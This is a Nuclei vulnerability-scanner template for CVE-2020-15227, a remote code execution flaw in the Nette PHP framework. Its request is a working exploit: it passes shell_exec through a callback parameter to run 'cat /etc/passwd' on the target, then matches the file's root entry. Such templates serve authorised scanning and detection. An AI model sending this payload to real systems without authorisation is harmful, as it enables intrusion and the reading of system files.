nuclei-templates/cves/2020/CVE-2020-15227.yaml

30 lines
1.1 KiB
YAML

id: CVE-2020-15227
info:
name: Nette Framework RCE
author: becivells
severity: high
description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-15227
- https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
- https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
- https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md
tags: cve,cve2020,nette,rce
requests:
- method: GET
path:
- "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200